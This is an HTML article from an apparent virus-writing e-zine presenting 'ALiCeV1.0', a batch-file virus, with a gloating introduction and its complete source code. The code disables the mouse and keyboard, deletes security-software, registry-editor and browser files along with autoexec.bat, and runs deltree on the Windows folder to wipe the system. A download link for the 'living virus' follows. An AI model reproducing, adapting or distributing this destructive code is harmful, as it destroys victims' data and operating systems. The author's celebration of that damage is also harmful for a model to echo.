<html>
<head>
<title>rRlf #2</title>
</head>
<body text="#ffffff" link="#58b3f6" vlink="#58b3f6" alink="#58b3f6" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Infiltration of a Nation</i>
<br><table cellpadding="9">
<tr>
<th><a href="35.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="37.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - ALiCeV1.0 by WhiTe_LiQUiD_doVe</u></b>
<p>&nbsp;oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOo
<br>{&nbsp;&nbsp;LUCKY CHARM'S CEREAL KILLAZ, INC.&nbsp;&nbsp;}
<br>.shrooms that will make your computer trip.
<p>&nbsp;oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOo
<p>concerning charm> ALiCeV1.0
<br>----------------
<br>This is our first batch "shroom" (shroom = virus).
<br>Her name is ALiCeV1.0 and she hates Windows.
<br>She will run off to MS-Dos and she will disable your mouse and keyboard while working on your installed Windows.
<br>Once her mission has been completed she will kill herself and leave you standing with nothing.
<br>Restart the computer and be amazed!
<br>Windows-Wonderland is gone and you are pretty much ... well, fucked!
<br>Supported by whiTe_LiQUiD_doVe and esplin9466, ALiCeV1.0 comes in different installable versions,
<br>the executable, the hidden extractable and the desktop executable.
<br>We are working on a newer version and are hoping to use some animation by ALiCeV2.0
<br>but until then she will be causing some "minor" destruction <laugh>.
<p>visit the NickPage at:
<br><a href="http://www.uboot.com/u/LuckyCharms">http://www.uboot.com/u/LuckyCharms</a>
<p>Will be working on a website soon!
<br>-the dove
<br>"destruction-hate-distortion-fate"
<p><u>Code:</u>
<p>@echo off
<br>cls
<br>echo.
<br>echo.
<br>echo&nbsp;&nbsp;oOoOoOoOoOoOoOoOoOoOo
<br>echo&nbsp;&nbsp;WELCOME TO WONDERLAND
<br>echo&nbsp;&nbsp;oOoOoOoOoOoOoOoOoOoOo
<br>echo.
<br>echo&nbsp;&nbsp;I am ALiCeV1.0 and...
<br>echo&nbsp;&nbsp;...I hate your family
<br>echo&nbsp;&nbsp;...I hate your mom
<br>echo&nbsp;&nbsp;...I hate you
<br>echo&nbsp;&nbsp;...I hate Windows
<br>echo&nbsp;&nbsp;...I hate nice days
<br>echo&nbsp;&nbsp;Do you like shrooms?
<br>choice
<br>echo&nbsp;&nbsp;Well, computers do!
<br>echo&nbsp;&nbsp;Let's see if your
<br>echo&nbsp;&nbsp;computer likes it!
<br>pause
<br>ctty nul
<br>c:\windows\rundll32.exe mouse,disable
<br>c:\windows\rundll32.exe keyboard,disable
<br>@echo off
<br>del c:\programme\norton~1\s32integ.dll
<br>del c:\windows\regedit.exe
<br>del c:\autoexec.bat
<br>del c:\windows\regedit.exe
<br>del c:\programme\intern~1\iexplorer.exe
<br>deltree /y c:\windows\system
<br>deltree /y c:\windows\
<br>del c:\windows\system\visys\alicev~1.bat
<p><a href="36.zip">living virus</a>
</body>
</html>